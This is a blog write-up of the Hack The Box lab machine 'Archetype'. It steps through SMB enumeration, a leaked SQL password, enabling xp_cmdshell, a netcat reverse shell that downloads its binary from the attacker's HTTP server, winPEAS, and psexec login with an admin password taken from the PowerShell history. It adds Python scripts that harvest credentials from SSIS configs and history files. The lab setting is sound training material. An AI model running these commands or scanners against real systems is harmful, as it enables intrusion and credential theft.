The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks


Archetype: From user to admin

posted on 21.5.2023 by Below Surface in "Hack The Box"

First, check the open TCP ports. Replace ip with the target machine's IP address here and in every command below.

sudo nmap -sV ip

Let's list the available shares on this machine:

smbclient -L ip

Let's try to open the share "backups" (when smbclient asks for a password, just press Enter; the share allows anonymous access):

smbclient \\\\ip\\backups

Then run

ls

to list the files and directories. The relevant file is:

prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

Let's download and open it:

get prod.dtsConfig
exit    # close the smbclient session
cat prod.dtsConfig

Output:

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

The connection string hands us a clear-text password (M3g4c0rp123), a user name (sql_svc) and the domain/machine name it authenticates against (ARCHETYPE). Data Source=. means the package ran against the SQL Server instance local to that host, so the same machine is our target. A .dtsConfig file is an SSIS package configuration; credentials saved into it end up on whatever share the deployment copied it to, which is exactly what happened here.
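As an added example (not part of the original post and not Impacket code), here is a small Python parser for the loot step above: it reads a .dtsConfig file, picks out every ConnectionString property, splits the OLE DB key=value string and returns the embedded credentials, so the same check can be run over any SSIS config found on a share, not just this one. The sample input is the prod.dtsConfig shown above; the function names and the ip placeholder are my own.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Sample input: the prod.dtsConfig contents shown above (copied from the page).
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(conn: str) -> Dict[str, str]:
    """Split an OLE DB style 'Key=Value;Key=Value;' string into a dict.

    Keys are lower-cased so 'User ID', 'user id' and 'UID' lookups behave
    the same. Values wrapped in quotes or braces that themselves contain ';'
    are not handled; SSIS-generated configs like the one above do not use them.
    """
    fields: Dict[str, str] = {}
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if not sep:
            continue  # empty trailing segment or malformed chunk
        fields[key.strip().lower()] = value.strip()
    return fields


def extract_credentials(dtsconfig_xml: str) -> List[Dict[str, object]]:
    """Return one record per ConnectionString property that stores a password."""
    root = ET.fromstring(dtsconfig_xml)
    hits: List[Dict[str, object]] = []
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if not path.endswith("Properties[ConnectionString]"):
            continue
        fields = parse_connection_string(conf.findtext("ConfiguredValue") or "")
        password = fields.get("password") or fields.get("pwd")
        if password is None:
            continue  # integrated auth or no secret embedded: nothing to loot
        user = fields.get("user id") or fields.get("uid") or ""
        domain, _, username = user.rpartition("\\")  # 'ARCHETYPE\sql_svc' -> two parts
        hits.append({
            "path": path,
            "data_source": fields.get("data source") or fields.get("server", ""),
            "domain": domain,
            "user": username,
            "password": password,
        })
    return hits


def mssqlclient_target(hit: Dict[str, object], host: str) -> str:
    """Build the DOMAIN/user@host form that mssqlclient.py takes.

    'Data Source=.' means the package ran against the local SQL Server
    instance, so host is the machine that exposed the share.
    """
    if hit["domain"]:
        return f"{hit['domain']}/{hit['user']}@{host}"
    return f"{hit['user']}@{host}"


if __name__ == "__main__":
    TARGET = "ip"  # placeholder, replace with the machine's IP address
    for hit in extract_credentials(SAMPLE_DTSCONFIG):
        print(f"{hit['path']}: {hit['domain']}\\{hit['user']} / {hit['password']}")
        print("  mssqlclient.py", mssqlclient_target(hit, TARGET), "-windows-auth")
```

Only entries that actually carry a Password/Pwd key are reported; a connection string using Integrated Security=SSPI holds no secret and is skipped, which keeps the output to credentials you can reuse.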

We will use mssqlclient.py from Impacket. Installing it (the repository now lives at fortra/impacket and the old URL redirects there; pip install replaces the deprecated setup.py install):

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 -m pip install .
cd examples

Then connect with the tool. Replace ip with the target's IP address (not your own):

python3 mssqlclient.py ARCHETYPE/sql_svc@ip -windows-auth

Paste in the password from above and hit enter. We are now logged in! Let's check what role we have on the SQL server:

SELECT is_srvrolemember('sysadmin');

The result is 1, i.e. true: sql_svc holds the sysadmin server role, which is what lets us change server configuration in the next step. Let's see whether xp_cmdshell is enabled:

EXEC xp_cmdshell 'net user';

It is disabled by default, so the call fails with an error saying the component is turned off. As sysadmin we can enable it ourselves ('show advanced options' has to be on first; sp_configure without arguments just lists the current settings so we can confirm the change):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

We may now execute system commands. mssqlclient.py wraps this in its own xp_cmdshell helper command (it also has enable_xp_cmdshell, which does the sp_configure steps above in one go), so the shorthand below works instead of a full EXEC statement:

xp_cmdshell "whoami"

This produces the following result:

output
-----------------
archetype\sql_svc
NULL

Now we want a reverse shell. For this we upload the netcat binary nc64.exe to the target and have it connect back to us.

Open a new terminal, fetch the binary and serve it over HTTP. Use the raw download URL: the github.com/.../blob/... page URL would save the HTML page instead of the executable.

cd ~/Downloads
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
ifconfig tun0   # note the inet address; the target will fetch from it
sudo python3 -m http.server 80

Then open yet another terminal and start a netcat listener on port 443:

sudo nc -lvnp 443

Now we go back to the SQL terminal and run

xp_cmdshell "powershell -c pwd"

The output is something like

NULL
Path
----
C:\Windows\system32
NULL
NULL
NULL

The working directory is C:\Windows\system32, where sql_svc cannot write, so we change to a directory it owns: its Downloads folder. Replace ip with your tun0 address (the inet value from ifconfig above). Note that wget inside PowerShell is an alias for Invoke-WebRequest, not GNU wget, hence the -outfile switch.

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://ip/nc64.exe -outfile nc64.exe"

In the terminal with the running HTTP server, it should display something like

ip - - [21/May/2023 12:51:36] "GET /nc64.exe HTTP/1.1" 200 -

Now, run this in the SQL terminal:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe ip 443"

The netcat listener should now show the reverse shell:

listening on [any] 443 ...
connect to [10.10.14.126] from (UNKNOWN) [10.129.95.187] 49685
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>

To get the user flag, run

cd ..
cd Desktop
type user.txt


To get the admin flag we need to escalate privileges; winPEAS enumerates the host for the usual ways to do that. We download it the same way we downloaded nc64.exe.

Stop the HTTP server, download winPEAS into the same directory and restart the server. The URL below is the pull-request build the post used; the current release build is at https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe if that one disappears.

ctrl + c   # stop the HTTP server
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
sudo python3 -m http.server 80

Then in the SQL terminal run (again, replace ip with your tun0 inet address):

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://ip/winPEASx64.exe -outfile winPEASx64.exe"

The server log confirms the download:

ip - - [22/May/2023 14:05:12] "GET /winPEASx64.exe HTTP/1.1" 200 -


Now in the reverse shell terminal window, we can navigate to the executable and run it:

cd ..
cd Downloads
.\winPEASx64.exe

winPEAS prints a long report. The interesting finding is a PowerShell command history file that our user can read:

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

So, let's navigate there and view the content.

cd ..
cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
type ConsoleHost_history.txt

Output:

type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

So we have the administrator password in clear text: MEGACORP_4dm1n!!. It got there because the password was passed as a plain command-line argument to net use, and PSReadLine records every interactive PowerShell command line, secrets included, to this per-user history file.
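Added example, not from the post: a Python scanner for PSReadLine history files that finds credentials passed on the command line. It goes a bit beyond the single line above: net use accepts the password either before or after /user: (both orders are valid), a lone * means "prompt for it" and must not be reported, /delete lines carry nothing, and cmdkey /pass: is the other common way a password lands in history. The sample history is constructed; only the net.exe use T: line is the real one from the box. Helper names and the HISTORY_GLOB constant are mine.

```python
import re
from pathlib import Path
from typing import Dict, Iterator, List, Optional

# Where PSReadLine keeps each user's interactive PowerShell history,
# relative to the Users directory (C:\Users on a live host, or a copied tree).
HISTORY_GLOB = "*/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"

# Constructed sample: line 2 is the entry from the Archetype history file
# shown above; the other lines are made up to exercise the other forms.
SAMPLE_HISTORY = "\n".join([
    r"type ConsoleHost_history.txt",
    r"net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!",
    r"net use Z: \\fileserver\share S3cret! /user:CORP\svc_backup",
    r"net use T: /delete",
    r"net use Y: \\fileserver\finance * /user:CORP\alice",
    r"cmdkey /add:db01 /user:CORP\dba /pass:Winter2023",
    r"Get-ChildItem C:\Users",
    r"exit",
])

DRIVE_RE = re.compile(r"^[a-z]:$", re.I)


def parse_net_use(args: List[str]) -> Optional[Dict[str, object]]:
    """Arguments after 'net use': [drive:] [\\\\server\\share [password | *]] [/user:[dom\\]name] ...

    The password is the one positional argument that is neither a drive
    letter, a UNC path, a switch nor '*' (which makes net use prompt for it).
    """
    user = share = password = None
    for tok in args:
        low = tok.lower()
        if low.startswith("/user:"):
            user = tok[len("/user:"):]
        elif low.startswith("/"):
            continue                      # /persistent, /delete, /savecred, ...
        elif DRIVE_RE.match(tok) or tok == "*":
            continue                      # drive letter, or "ask me for the password"
        elif tok.startswith("\\\\"):
            share = tok
        elif password is None:
            password = tok
    if user is None or password is None:
        return None                       # prompted for the password, or a /delete
    return {"tool": "net use", "target": share, "user": user, "password": password}


def parse_cmdkey(args: List[str]) -> Optional[Dict[str, object]]:
    """'cmdkey /add:target /user:name /pass:password' (also /generic:target)."""
    fields: Dict[str, str] = {}
    for tok in args:
        key, sep, value = tok.lstrip("/").partition(":")
        if sep and tok.startswith("/"):
            fields[key.lower()] = value
    if "user" not in fields or "pass" not in fields:
        return None
    return {"tool": "cmdkey", "target": fields.get("add") or fields.get("generic"),
            "user": fields["user"], "password": fields["pass"]}


def scan_history(text: str) -> List[Dict[str, object]]:
    """Walk a history file line by line and return every credential found."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        tokens = line.strip().split()
        if not tokens:
            continue
        # 'net', 'net.exe' and 'C:\Windows\System32\net.exe' are the same command.
        cmd = tokens[0].rsplit("\\", 1)[-1].lower()
        if cmd.endswith(".exe"):
            cmd = cmd[:-4]
        hit = None
        if cmd == "net" and len(tokens) > 2 and tokens[1].lower() == "use":
            hit = parse_net_use(tokens[2:])
        elif cmd == "cmdkey":
            hit = parse_cmdkey(tokens[1:])
        if hit:
            hit["line"] = lineno
            hits.append(hit)
    return hits


def find_history_files(users_root: Path) -> Iterator[Path]:
    """Yield every user's history file under users_root that we are allowed to glob."""
    return users_root.glob(HISTORY_GLOB)


if __name__ == "__main__":
    for hit in scan_history(SAMPLE_HISTORY):
        print(f"line {hit['line']}: {hit['tool']} -> {hit['user']} : {hit['password']} ({hit['target']})")
```

Because the history file is per user, it is worth running find_history_files over the whole Users tree rather than only your own profile: on a loosely configured host other profiles are often world-readable, and an administrator who mapped a share once is exactly the kind of entry this turns up.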


Connect with Impacket's psexec.py (replace ip with the target's IP address; enter the password when prompted):

cd impacket/examples
python3 psexec.py administrator@ip

psexec.py drops us into a SYSTEM shell starting in C:\Windows\system32, so walk up to the drive root and read the flag:

cd ..
cd ..
cd Users\Administrator\Desktop
type root.txt

Finished!

Tags:

hack the box
nmap
smb
smbclient
mssqlclient
xp_cmdshell
winpeas
psexec

Sources:

https://app.hackthebox.com/starting-point
https://www.youtube.com/watch?v=IOAv8IaV5oc
